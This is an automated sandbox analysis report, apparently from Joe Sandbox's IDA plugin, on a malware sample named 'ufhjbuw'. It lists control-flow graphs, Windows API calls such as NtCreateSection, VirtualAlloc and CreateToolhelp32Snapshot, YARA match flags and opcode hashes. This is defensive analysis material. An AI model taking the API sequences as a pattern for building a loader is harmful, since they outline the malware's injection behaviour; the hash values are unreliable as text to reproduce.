                                                                                                                                                                      • Instruction ID: 7172b0b9a9028b5bc288cbda9fb143cf9a5cc347473573ab14e018b37c9fdbfb
                                                                                                                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                      • Instruction Fuzzy Hash: 88527B78A01229DFDBA4CF58C984BA9BBB1BF09304F1480DAE50DA7351DB34AE85DF15
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 355 426f5c-426f6a 356 426f6c-426f76 355->356 357 426f78-426f79 SetConsoleOutputCP 356->357 358 426f7f-426f93 356->358 357->358 359 426f95-426fa8 SetFileAttributesW OpenWaitableTimerA 358->359 360 426fae-426faf 358->360 359->360 360->356 361 426fb1 360->361 362 426fb3-426fb9 361->362 363 426fca-426fd4 362->363 364 426fbb-426fc5 362->364 365 427010-427017 363->365 366 426fd6-427006 WriteConsoleOutputA 363->366 364->363 365->362 367 427019 call 426c1f 365->367 366->365 369 42701e-427024 367->369
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetConsoleOutputCP.KERNEL32(00000000), ref: 00426F79
                                                                                                                                                                      • SetFileAttributesW.KERNEL32(0042A988,00000000), ref: 00426F9B
                                                                                                                                                                      • OpenWaitableTimerA.KERNEL32(00000000,00000000,0042A9B0), ref: 00426FA8
                                                                                                                                                                      • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00426FF9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleOutput$AttributesFileOpenTimerWaitableWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1436354611-0
                                                                                                                                                                      • Opcode ID: 62ed26e15b5a49391d8a23dc0cda7980fbfb03aaa03a303bc663d0258708f716
                                                                                                                                                                      • Instruction ID: 644fc488f5917a07c12c4052361495bd25380895930b253282537b45d16775f0
                                                                                                                                                                      • Opcode Fuzzy Hash: 62ed26e15b5a49391d8a23dc0cda7980fbfb03aaa03a303bc663d0258708f716
                                                                                                                                                                      • Instruction Fuzzy Hash: 5811E231A01225BFCF129BA9FD4599F7778FB01324B53553AE100A2160D7784A4ACF6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 433 6ef95d-6ef976 434 6ef978-6ef97a 433->434 435 6ef97c 434->435 436 6ef981-6ef98d CreateToolhelp32Snapshot 434->436 435->436 437 6ef98f-6ef995 436->437 438 6ef99d-6ef9aa Module32First 436->438 437->438 443 6ef997-6ef99b 437->443 439 6ef9ac-6ef9ad call 6ef61c 438->439 440 6ef9b3-6ef9bb 438->440 444 6ef9b2 439->444 443->434 443->438 444->440
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006EF985
                                                                                                                                                                      • Module32First.KERNEL32(00000000,00000224), ref: 006EF9A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1987664254.00000000006EC000.00000040.00000020.00020000.00000000.sdmp, Offset: 006EC000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6ec000_ufhjbuw.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3833638111-0
                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction ID: 24d16d3a5709c8bd55f9579a95008983b035fb54c3f3d64a9d37ea62692ed4de
                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                      • Instruction Fuzzy Hash: 0AF0F6366013507FD7203BF6A88CBAE72E9AF48324F100539E682D21C1CB70EC458660
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 446 4c0e0f-4c0e24 SetErrorMode * 2 447 4c0e2b-4c0e2c 446->447 448 4c0e26 446->448 448->447
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000400,?,?,004C0223,?,?), ref: 004C0E19
                                                                                                                                                                      • SetErrorMode.KERNELBASE(00000000,?,?,004C0223,?,?), ref: 004C0E1E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1984120576.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004C0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_4c0000_ufhjbuw.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction ID: 37266e850fa7461fd680b01f9627d0ca78227899bd460c9d1794fc9cdfc8cad4
                                                                                                                                                                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                      • Instruction Fuzzy Hash: 24D01235145128B7D7403A94DC09BDE7B1CDF05B62F008411FB0DD9180C774994046E9
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 449 426a16-426a75 LoadLibraryA
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(004361E8,00426EB5), ref: 00426A6F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: 9e85f7e3211469c7aff70de8e8f6211f89e9375843a5db308750fb0cf86726ac
                                                                                                                                                                      • Instruction ID: 335214d8cf92d86652192826c7dd3f95ee96a184b7b7a1d6687d55eba145f56e
                                                                                                                                                                      • Opcode Fuzzy Hash: 9e85f7e3211469c7aff70de8e8f6211f89e9375843a5db308750fb0cf86726ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 92F0CE1054C2D3E8EF52C368AD19B153E95132264CF5AA1BD81901A2A3CAEBC229C77E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 450 40193e-401947 451 40195e 450->451 452 40194f-40195a 450->452 451->452 453 401961-4019ae call 4011cd Sleep call 401452 451->453 452->453 464 4019b0-4019b8 call 401553 453->464 465 4019bd-401a03 call 4011cd 453->465 464->465
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction ID: 4db8ba0b08380255fc5aa34ea3e13561f838480f888933e927f1079a64c57490
                                                                                                                                                                      • Opcode Fuzzy Hash: 71f746a8505fe108ed8da4cdd9973d259565c9a68103dfaed9332816d2b6fe75
                                                                                                                                                                      • Instruction Fuzzy Hash: 9A11CEF120C208FBEB006A959D62E7A3268AB40714F304137BA43790F1D57E8923F76B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 479 40194a-4019ae call 4011cd Sleep call 401452 492 4019b0-4019b8 call 401553 479->492 493 4019bd-401a03 call 4011cd 479->493 492->493
                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction ID: 0371ecd990254dd767a604aa567081474727263e4e3774a05daf7e54a603023c
                                                                                                                                                                      • Opcode Fuzzy Hash: da38201a32f90b98934b488a65b371e434f1df0c2a04d29242935d2455de016b
                                                                                                                                                                      • Instruction Fuzzy Hash: A901A1B120C204EBDB009A95DD62E7A3364AB40314F30453BBA437A1F1C67D9913E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction ID: 3b2e7dc224df146109f963d95c0ead7a9e1b698bafe8296883a7ac19869aede1
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e3dbe5dd20a4fb5b92f76c9b13fda5f390ba4e8200e1751a23b03b4d52e4fb4
                                                                                                                                                                      • Instruction Fuzzy Hash: BA0171B5208204EADB006AD5DD71E7A3269AB44314F304537BA43791F1D57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction ID: 4b03b50232763afd30ab0c608f125a1a80ed78bb00471cf4ed55e3bed959d7b6
                                                                                                                                                                      • Opcode Fuzzy Hash: acb1fae293eb73a10805bbdd55e216ebbc49928181db8483aeacc3243d44ee5b
                                                                                                                                                                      • Instruction Fuzzy Hash: F80184B5208204EBDB006AD5DD71EBA3269AB44354F304537BA43790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction ID: f592bab324d3cd5d6286c78059ef0a1e8702b22de7bd53a4ec4d5e19e7ef6e8c
                                                                                                                                                                      • Opcode Fuzzy Hash: e5353c19dd0b10c2d892503bd00f36fba5e3f507ee708bcba0cfbdc82fbef293
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D0184B5208204EBDB006AC5DD62EBA3265AB44314F204537FA43791F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006EF66D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1987664254.00000000006EC000.00000040.00000020.00020000.00000000.sdmp, Offset: 006EC000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6ec000_ufhjbuw.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction ID: 8850836d76fd4de9853d08d5666b3e2640692ff2c6672a93ef282379f6f76d15
                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                      • Instruction Fuzzy Hash: 9F113979A00208FFDB01DF99C985E98BBF5AF08350F1580A4F9489B362D371EA90DF84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction ID: 68c2b1bb8267a16b47d2b790190fa602822f098e0b694be4ddc2e306b3be1968
                                                                                                                                                                      • Opcode Fuzzy Hash: 74fb996ba95ec06bb2abe22af5600ab9efc13f551b73dbf86f34961914988ff4
                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF086B5208204FADB006BD59D61EBA3768AB44354F204137BA13790F1C57D8912F72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNELBASE(00001388,0000006E), ref: 00401999
                                                                                                                                                                        • Part of subcall function 00401553: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                        • Part of subcall function 00401553: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983903477.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                                      • Opcode ID: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction ID: 49220a4dcaca44086484813bdb512237367292e15b320859d1a96440f4f24ef4
                                                                                                                                                                      • Opcode Fuzzy Hash: f19d6598d7b3f8bbc47500c90c3d0bc6a0ede41a7b6f28d3ccddc132527cc834
                                                                                                                                                                      • Instruction Fuzzy Hash: 7801A7B1208244FBDB016BD19D62EB93768AB05354F204537FA53790F2C67D8912E72B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,00426E43), ref: 0042627E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                      • Opcode ID: c63c633476a6b30e3cbc72ccf2760e4f1e962cc8df0d4cd49a32820b50132be8
                                                                                                                                                                      • Instruction ID: fc1c605fa557deb304322e7621df349ca9de26fb8ada197018152d43c4ea838b
                                                                                                                                                                      • Opcode Fuzzy Hash: c63c633476a6b30e3cbc72ccf2760e4f1e962cc8df0d4cd49a32820b50132be8
                                                                                                                                                                      • Instruction Fuzzy Hash: C9B09270906202BACB010B50BC04B043A60A308202F029038E10044169CE6100009E18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ___getlocaleinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1937885557-0
                                                                                                                                                                      • Opcode ID: 2ae363ac02f4675a99ef2d0811e9ab02511fa2d8fd44f1555ce616a9256f3ba2
                                                                                                                                                                      • Instruction ID: 1d8a4a4208fe846f8572adedd4c486c13295830ddccbb16d2b6caae59cd68764
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ae363ac02f4675a99ef2d0811e9ab02511fa2d8fd44f1555ce616a9256f3ba2
                                                                                                                                                                      • Instruction Fuzzy Hash: 81E1BFB2D0021DBEEF11DAE1CC41DFF77BDEB48748F04452AB255F2081EA75AA099B64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • SetConsoleCP.KERNEL32(00000000), ref: 00426C5A
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00426C60
                                                                                                                                                                      • GetCompressedFileSizeA.KERNEL32(00000000,?), ref: 00426C7E
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,00000000), ref: 00426C88
                                                                                                                                                                      • CopyFileExW.KERNEL32(0042A884,0042A840,00000000,00000000,00000000,00000000), ref: 00426CD8
                                                                                                                                                                      • AddAtomA.KERNEL32(00000000), ref: 00426CE0
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426CE8
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00426CF0
                                                                                                                                                                      • EnumDateFormatsExA.KERNEL32(00000000,00000000,00000000), ref: 00426CFC
                                                                                                                                                                      • RtlTryEnterCriticalSection.NTDLL(?), ref: 00426D12
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00426D55
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00426D5D
                                                                                                                                                                      • SetTimeZoneInformation.KERNEL32(00000000), ref: 00426D6F
                                                                                                                                                                      • DnsHostnameToComputerNameW.KERNEL32(0042A8B8,?,?), ref: 00426D88
                                                                                                                                                                      • IsProcessInJob.KERNEL32(00000000,00000000,00000000), ref: 00426D94
                                                                                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000), ref: 00426D9C
                                                                                                                                                                      • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00426DA8
                                                                                                                                                                      • CompareStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00426DBA
                                                                                                                                                                      • GetLongPathNameA.KERNEL32(0042A96C,?,00000000), ref: 00426DCE
                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00426DDA
                                                                                                                                                                      • VirtualLock.KERNEL32(00000000,00000000), ref: 00426EA8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Free$FileName$AtomCompareCompressedComputerConsoleCopyCreateCriticalCurrentDateDirectoryEnterEnumEnvironmentErrorFormatsHandleHeapHostnameInformationLastLibraryLocalLockLongModulePathProcessSectionSizeStringStringsTimeTimerValueVirtualWaitableZone
                                                                                                                                                                      • String ID: tl_
                                                                                                                                                                      • API String ID: 3672566368-2653253968
                                                                                                                                                                      • Opcode ID: 023b01b2221e3b475b69840e1338eb58c9f171fb43f840df13a42cd57c5a8a76
                                                                                                                                                                      • Instruction ID: 593f59daaad18869312403a55f7fc19da0f2a56b7eb65824d8e59fabf7132564
                                                                                                                                                                      • Opcode Fuzzy Hash: 023b01b2221e3b475b69840e1338eb58c9f171fb43f840df13a42cd57c5a8a76
                                                                                                                                                                      • Instruction Fuzzy Hash: C9716F31B45314EFEB20AB55FC46B9C77B4AB04716F92407AF209AA1D0CBB81985CF1E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStringTypeW.KERNEL32(00000001,0042A804,00000001,?,004360B4,?,00000000,?,?,?,00415FA2,00000001,?,0040DB7F,?,?), ref: 00415DE7
                                                                                                                                                                      • GetLastError.KERNEL32(?,00415FA2,00000001,?,0040DB7F,?,?,?,?,0040DB7F,?,00000001,0040DB7F,00000000,?,00410202), ref: 00415DF9
                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,00410202,0040DB7F,00000004), ref: 00415ED6
                                                                                                                                                                      • __freea.LIBCMT ref: 00415EE0
                                                                                                                                                                      • ___ansicp.LIBCMT ref: 00415F0A
                                                                                                                                                                      • ___convertcp.LIBCMT ref: 00415F2B
                                                                                                                                                                        • Part of subcall function 00417DBB: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000), ref: 00417EE7
                                                                                                                                                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,004360B4,?,00000000,?,?,?,00415FA2,00000001,?,0040DB7F,?), ref: 00415F4B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_3_2_40b000_ufhjbuw.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: StringType$ByteCharErrorLastMultiWide___ansicp___convertcp__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2117302395-0
                                                                                                                                                                      • Opcode ID: 68925163f8d2cb2ffe34cbaa868f7041e780839bbbf2ba4cae6835cd480bb5fe
                                                                                                                                                                      • Instruction ID: ca033a73e6e72983c9a9d679e9bdb60d592808fde03c7af922bf76edf28fa3e8
                                                                                                                                                                      • Opcode Fuzzy Hash: 68925163f8d2cb2ffe34cbaa868f7041e780839bbbf2ba4cae6835cd480bb5fe
                                                                                                                                                                      • Instruction Fuzzy Hash: CD51947190060AEFDF209F64DC819EF3BA9EB44354B14442BF914D7251D739CEA28F98
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00426AA6: CreateJobObjectW.KERNEL32(00000000,0042A808), ref: 00426ABE
                                                                                                                                                                        • Part of subcall function 00426AA6: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00426ADE
                                                                                                                                                                        • Part of subcall function 00426AA6: QueryPerformanceFrequency.KERNEL32(?), ref: 00426AE8
                                                                                                                                                                      • AbortSystemShutdownA.ADVAPI32(00000000), ref: 00426BB2
                                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00426BBF
                                                                                                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00426BC6
                                                                                                                                                                      • EqualSid.ADVAPI32(00000000,00000000), ref: 00426BCE
                                                                                                                                                                      • ReadEventLogW.ADVAPI32(00000000,00000000,00000000,?,00000000,?,?), ref: 00426BED
                                                                                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00426BFB
                                                                                                                                                                      • SetMessageWaitingIndicator.KERNEL32(00000000,00000000), ref: 00426C03
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000003.00000002.1983934615.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
